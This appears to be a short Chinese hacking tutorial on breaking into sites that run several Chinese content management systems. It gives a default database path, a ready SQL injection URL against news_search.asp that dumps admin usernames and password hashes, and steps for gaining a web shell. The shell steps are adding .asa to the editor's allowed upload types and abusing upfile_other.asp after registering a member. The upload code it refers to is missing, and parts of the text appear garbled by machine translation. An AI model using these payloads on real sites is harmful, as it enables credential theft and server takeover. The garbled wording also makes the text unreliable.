网站内容管理系统上传图片(南方数据、良精系统、网软天下漏洞利用(组图))

　　网站内容管理系统上传图片(南方数据、良精系统、网软天下漏洞利用(组图))

　　/数据库/0791idc.mdb

　　1. 注入点：news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or'%'='&otype=title&Submit=%CB%D1%CB%F7

　　也可能是（另一个版本）news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9, 10 来自 admin where 1 or'%'='&otype=title&Submit=%CB%D1%CB%F7

　　直接销毁管理员账号密码（md5)

　　2.登录后台

　　3.使用编辑器上传：

　　访问 admin/southidceditor/admin_style.asp

　　修改编辑器样式，添加asa（不是asp）。然后直接在后台编辑新闻上传。

　　========================================

　　参考资料整理：

　　南方数据、良精系统、网软世界漏洞利用

　　1、直接通过upfile_other.asp漏洞文件获取SHELL

　　直接打开userreg.asp注册会员，登录，（在未注销状态下），使用本地上传文件上传代码如下：

　　将以上代码保存为html格式，替换代码中的URL，在第一个框中选择图片文件，在第二个框中上传.cer、.asa或asp文件（需要在后面加一个空格，好像是在IE8里用的，后面不能加空格，加空格的时候弹出文件选择对话框，没找到解决办法）。

　　注：此方法杀南方数据、良精系统、网软世界等。